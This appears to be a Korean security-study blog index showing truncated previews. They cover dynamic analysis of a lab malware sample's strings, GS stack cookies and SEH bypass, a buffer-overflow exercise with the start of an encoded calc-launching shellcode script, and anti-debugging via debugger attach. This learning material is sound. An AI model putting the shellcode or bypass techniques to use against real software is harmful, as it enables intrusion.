기초 동적 분석 도구를 이용해 Lab03-01.exe파일에서 발견된 악성코드를 분석하라. Q : 악성코드의 임포트 함수와 문자열은 무엇?우선, Process Explorer의 Strings로 살펴본 결과 임포트 함수는 ExitProcess 밖에 없었고,문자열은 엄청나게 많으며 난독화도 되어있지 않았다. 임포트 함수를 확실히 보기 위해 정적도구 STRINGS를 이용하였다. 추가적으로 파일에 담아서 보기 위함도 있다. !This program cannot be run in DOS mode.Rich.text`.dataExitProcesskernel32.dllws2_32A)|-~_"p7cks=uttp=cks=CONNECT %s:%i HTTP/1.0QSRW?503 200 PWWthj@hPWWVSWRQYZ_[^f5..

보호되어 있는 글입니다.

보호되어 있는 글입니다.

GS Guard Stack : Stack의 저장한 RET가 변조 여부를 감지하기 위해 임의의 값을 Stack 보다 윗 부분에 삽입 => 그 임의의 값이 덮여지게 되면 예외처리 루틴을 통해 프로그램이 즉시 종료가 된다. GS Cookie라고도 한다. Visual Studio에서 GS 활성화 하면 다음과 같은 어셈을 볼 수 있다. 00401002 in al,dx 00401003 sub esp,80h 00401009 mov eax,dword ptr [___security_cookie (403000h)] 0040100E xor eax,ebp 00401010 mov dword ptr [ebp-4],eax 예외처리 루틴이 Stack에 존재하는 경우가 SEH이다. 우리는 SEH를 공략해서 우회를 시도한다. Struc..

실제 상용프로그램이었던 프로그램을 이용해서 BOF 기초를 익혀보자. 목표 : 계산기 실행 #! Python import struct #bufbuf = ""buf += "\x89\xe2\xda\xc3\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49"buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4f\x4e\x68\x58\x49"buf += ..

Debugger Attach : 프로그램 시작 시 루틴에 안티디버깅 기법이 삽입될 경우에 우회가 가능하다. 중간에 Attach를 해서 우회를 할 수도 있다. ollydbg와 notepad를 이용해서 실습을 진행. 만약 프로그램 실행 하다 overflow가 발생하면 ollydbg로 확인할 수가 있다. Attach를 하는이유? 일반적인 오류보고 레포트는 프로그램 내에서 작업이 잘 되지 않았을 경우에 나온다. 일부러 예외처리를 ollydbg에서 하게 되면, 디버거(ollydbg)에게 바로 넘겨서 확인할 수 있다.그래서 Attach를 하는 것이다. INT3 (0xcc)INT3 명령어에 도달하면 디버기(디버깅당하는 애-notepad)가 디버거(ollydbg)에게 제어권을 넘겨준다 Debugger에서 처리하지 않는..